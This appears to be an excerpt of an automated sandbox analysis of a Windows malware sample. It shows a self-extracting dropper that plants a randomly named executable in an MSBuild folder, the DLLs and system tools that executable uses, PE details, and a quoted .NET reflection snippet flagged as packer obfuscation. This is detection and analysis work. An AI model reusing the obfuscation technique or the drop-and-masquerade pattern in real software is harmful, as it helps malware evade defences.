                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: wldp.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: profapi.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: cryptsp.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: rsaenh.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: cryptbase.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: sspicli.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: rasapi32.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: rasman.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: rtutils.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: mswsock.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: winhttp.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: ondemandconnroutehelper.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: iphlpapi.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: dhcpcsvc6.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: dhcpcsvc.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: dnsapi.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: uxtheme.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: propsys.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: apphelp.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: dlnashext.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: wpdshext.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: edputil.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: urlmon.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: iertutil.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: srvcli.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: netutils.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: windows.staterepositoryps.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: wintypes.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: appresolver.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: bcp47langs.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: slc.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: userenv.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: sppc.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: onecorecommonproxystub.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: onecoreuapcommonproxystub.dll
                                    Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                                    Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
                                    Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
                                    Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dll
                                    Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dll
                                    Source: C:\Windows\System32\PING.EXESection loaded: dnsapi.dll
                                    Source: C:\Windows\System32\PING.EXESection loaded: rasadhlp.dll
                                    Source: C:\Windows\System32\PING.EXESection loaded: fwpuclnt.dll
                                    Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: mscoree.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: version.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: windows.storage.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: wldp.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: profapi.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: cryptsp.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: rsaenh.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: cryptbase.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: sspicli.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: rasapi32.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: rasman.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: rtutils.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: mswsock.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: winhttp.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: ondemandconnroutehelper.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: iphlpapi.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: dhcpcsvc6.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: dhcpcsvc.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: dnsapi.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: uxtheme.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: propsys.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: apphelp.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: dlnashext.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: wpdshext.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: edputil.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: urlmon.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: iertutil.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: srvcli.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: netutils.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: windows.staterepositoryps.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: wintypes.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: appresolver.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: bcp47langs.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: slc.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: userenv.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: sppc.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: onecorecommonproxystub.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: onecoreuapcommonproxystub.dll
                                    Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                                    Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
                                    Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: iphlpapi.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: logoncli.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: netutils.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: ntmarta.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: ntdsapi.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: mswsock.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: dnsapi.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: rasadhlp.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: fwpuclnt.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: mscoree.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: version.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: windows.storage.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: wldp.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: profapi.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: cryptsp.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: rsaenh.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: cryptbase.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: sspicli.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: rasapi32.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: rasman.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: rtutils.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: mswsock.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: winhttp.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: ondemandconnroutehelper.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: iphlpapi.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: dhcpcsvc6.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: dhcpcsvc.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: dnsapi.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: uxtheme.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: propsys.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: apphelp.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: dlnashext.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: wpdshext.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: edputil.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: urlmon.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: iertutil.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: srvcli.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: netutils.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: windows.staterepositoryps.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: wintypes.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: appresolver.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: bcp47langs.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: slc.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: userenv.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: sppc.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: onecorecommonproxystub.dll
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeSection loaded: onecoreuapcommonproxystub.dll
                                    Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                                    Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
                                    Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: iphlpapi.dll
                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32Jump to behavior
                                    Source: Window RecorderWindow detected: More than 3 window changes detected
                                    Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exeDirectory created: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exeDirectory created: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\e226a7d7102d53Jump to behavior
                                    Source: 7vP2IvNXqx.exeStatic file information: File size 1978248 > 1048576
                                    Source: 7vP2IvNXqx.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                                    Source: 7vP2IvNXqx.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                                    Source: 7vP2IvNXqx.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                                    Source: 7vP2IvNXqx.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                                    Source: 7vP2IvNXqx.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                                    Source: 7vP2IvNXqx.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                                    Source: 7vP2IvNXqx.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                    Source: 7vP2IvNXqx.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                                    Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: 7vP2IvNXqx.exe
                                    Source: Binary string: System.Windows.Forms.pdb source: fXvSafnhbinoSxnWSYFNsCJETLnb.exe, 00000016.00000002.1942135265.0000000000EA2000.00000004.00000020.00020000.00000000.sdmp
                                    Source: Binary string: KZll\System.pdb source: fXvSafnhbinoSxnWSYFNsCJETLnb.exe, 0000000F.00000002.1883052954.000000001B550000.00000004.00000020.00020000.00000000.sdmp
                                    Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: fXvSafnhbinoSxnWSYFNsCJETLnb.exe, 00000039.00000002.2484543389.000000001B460000.00000004.00000020.00020000.00000000.sdmp
                                    Source: Binary string: em.pdb source: fXvSafnhbinoSxnWSYFNsCJETLnb.exe, 00000025.00000002.2201826455.000000001B201000.00000004.00000020.00020000.00000000.sdmp
                                    Source: Binary string: System.pdb source: fXvSafnhbinoSxnWSYFNsCJETLnb.exe, 00000039.00000002.2484543389.000000001B460000.00000004.00000020.00020000.00000000.sdmp
                                    Source: 7vP2IvNXqx.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                                    Source: 7vP2IvNXqx.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                                    Source: 7vP2IvNXqx.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                                    Source: 7vP2IvNXqx.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                                    Source: 7vP2IvNXqx.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

                                    Data Obfuscation

                                    barindex
                                    .NET source code contains method to dynamically call methods (often used by packers)
                                    Source: 0.3.7vP2IvNXqx.exe.7015722.0.raw.unpack, Qr2vJkulGbfJGi4ursy.cs.Net Code: Type.GetTypeFromHandle(d5MMuGMeSJBTWp1ISUZ.cPF83dtDEV4(16777425)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(d5MMuGMeSJBTWp1ISUZ.cPF83dtDEV4(16777246)),Type.GetTypeFromHandle(d5MMuGMeSJBTWp1ISUZ.cPF83dtDEV4(16777260))})
                                    Source: 0.3.7vP2IvNXqx.exe.792c722.1.raw.unpack, Qr2vJkulGbfJGi4ursy.cs.Net Code: Type.GetTypeFromHandle(d5MMuGMeSJBTWp1ISUZ.cPF83dtDEV4(16777425)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(d5MMuGMeSJBTWp1ISUZ.cPF83dtDEV4(16777246)),Type.GetTypeFromHandle(d5MMuGMeSJBTWp1ISUZ.cPF83dtDEV4(16777260))})
                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exeFile created: C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\__tmp_rar_sfx_access_check_5389750Jump to behavior
                                    Source: 7vP2IvNXqx.exeStatic PE information: section name: .didat
                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exeCode function: 0_2_002EF640 push ecx; ret 0_2_002EF653
                                    Source: C:\Users\user\Desktop\7vP2IvNXqx.exeCode function: 0_2_002EEB78 push eax; ret 0_2_002EEB96
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeCode function: 15_2_00007FFD9BB0F450 push ebp; ret 15_2_00007FFD9BB0F46A
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeCode function: 15_2_00007FFD9BB0F3E5 push ecx; ret 15_2_00007FFD9BB0F3F2
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeCode function: 15_2_00007FFD9BB0F3E8 push ecx; ret 15_2_00007FFD9BB0F3F2
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeCode function: 15_2_00007FFD9BB0F400 push edx; ret 15_2_00007FFD9BB0F41A
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeCode function: 15_2_00007FFD9BB0F38D push eax; ret 15_2_00007FFD9BB0F3A2
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeCode function: 15_2_00007FFD9BB12B10 pushad ; ret 15_2_00007FFD9BB12B11
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeCode function: 15_2_00007FFD9BB13A73 pushad ; retf 15_2_00007FFD9BB13A9D
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeCode function: 15_2_00007FFD9BB11FDE push edi; ret 15_2_00007FFD9BB11FDF
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeCode function: 15_2_00007FFD9BB12578 pushad ; ret 15_2_00007FFD9BB125A1
                                    Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\fXvSafnhbinoSxnWSYFNsCJETLnb.exeCode function: 15_2_00007FFD9BB12588 pushad ; ret 15_2_00007FFD9BB125A1
